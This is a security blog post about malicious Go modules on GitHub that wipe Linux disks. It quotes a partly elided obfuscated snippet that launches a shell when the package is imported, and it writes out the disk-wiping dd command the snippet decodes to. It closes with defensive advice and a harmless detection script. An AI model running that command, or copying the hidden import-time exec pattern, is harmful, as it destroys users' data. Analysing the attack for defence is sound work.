Don’t Run That Go Module: The Malware That Wipes Your Linux Disk
Recently, malicious software was discovered in Go packages hosted on GitHub. This malware has the ability to completely destroy your Linux system. Let's look at what happened and how we can protect ourselves.
What Happened?
In April 2025, a supply chain attack targeted the Go ecosystem. Attackers published fake but convincing modules with malicious code to GitHub:
- github.com/truthfulpharm/prototransform
- github.com/blankloggia/go-mcp
- github.com/steelpoor/tlsproxy
The attackers carefully crafted these package names to appear trustworthy at a glance, significantly increasing the chance of accidental inclusion in real development projects.
Once the malicious code is activated, it executes commands that systematically write zeroes across **every byte of the primary storage device**, making data recovery nearly impossible.
To hide the malicious intent, the attackers used a technique called obfuscation, as seen in the code snippet below:
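    func eGtROk() error {
        // Lookup table of short strings; the command is assembled from it by index.
        DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "..."}
        // The payload is gated on the operating system: Linux only.
        pBRPhsxN := runtime.GOOS == "linux"
        bcbGOM := "/bin/sh"
        vpqIU := "-c"
        PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + ...
        if pBRPhsxN {
            exec.Command(bcbGOM, vpqIU, PWcf).Start()
        }
        return nil
    }

    // Package-level initializer: the call runs during package initialization,
    // so importing the package into a program that is then run is enough.
    var GEeEQNj = eGtROk()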
When imported and executed, this code runs a destructive Bash command:
    dd if=/dev/zero of=/dev/sda bs=1M
Why Is This So Dangerous?
- This is not a vulnerability — it’s destructive malware.
- The malicious payload is hidden inside Go code with deceptively legitimate module names.
- It targets Linux systems only, checking the OS before executing.
How Can You Stay Safe as a Go Developer?
- Always verify module sources: Use official sources or verified maintainers. Random GitHub modules with few stars or forks should raise red flags.
- Run govulncheck regularly: Go’s official vulnerability scanner helps detect known issues.
      go install golang.org/x/vuln/cmd/govulncheck@latest
      govulncheck ./...
- Scan your dependencies with external tools: Tools like OSV-Scanner or Dependabot can help detect dangerous packages early.
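The snippet shown earlier relies on a package-level variable whose initializer calls a function that launches a process, so the code runs on import. As an added example (not from the original post and not part of any tool named above), this Go program checks source text for that pattern; `ImportTimeExec` and `sample` are hypothetical names, and the sample source is constructed and harmless.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// sample is constructed and harmless; it is only parsed, never compiled or run.
const sample = "package p\nimport \"os/exec\"\nvar _ = load()\n" +
	"func load() error {\n\texec.Command(\"/bin/sh\", \"-c\", \"true\").Start()\n\treturn nil\n}\n"

// ImportTimeExec reports calls made outside any declared function (package-level
// initializers) to a function in the same file that references exec.Command.
// Heuristic: assumes os/exec is imported under its default name "exec".
func ImportTimeExec(src string) ([]string, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, "scan.go", src, 0)
	if err != nil {
		return nil, err
	}
	spawns := map[string]bool{} // functions whose body references exec.Command
	var calls []*ast.CallExpr   // calls found outside declared functions
	ast.Inspect(f, func(n ast.Node) bool {
		switch n := n.(type) {
		case *ast.FuncDecl:
			ast.Inspect(n, func(m ast.Node) bool {
				if s, ok := m.(*ast.SelectorExpr); ok && s.Sel.Name == "Command" {
					x, ok := s.X.(*ast.Ident)
					spawns[n.Name.Name] = spawns[n.Name.Name] || (ok && x.Name == "exec")
				}
				return true
			})
			return false // function bodies are not package-level code
		case *ast.CallExpr:
			calls = append(calls, n)
		}
		return true
	})
	var hits []string
	for _, c := range calls {
		if id, ok := c.Fun.(*ast.Ident); ok && spawns[id.Name] {
			hits = append(hits, fmt.Sprintf("line %d: %s() runs at import", fset.Position(c.Pos()).Line, id.Name))
		}
	}
	return hits, nil
}

func main() { fmt.Println(ImportTimeExec(sample)) }
```

A hit is a prompt for manual review of the dependency, not proof of malice; the check looks at one file at a time and does not follow calls across files or packages.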
Have Thoughts or Questions?
If you have suggestions or questions, feel free to drop a comment.
Thanks for reading — stay safe!
References
cybersecuritynews.com/hackers-weaponizing-go-modules
go.dev/doc/tutorial/govulncheck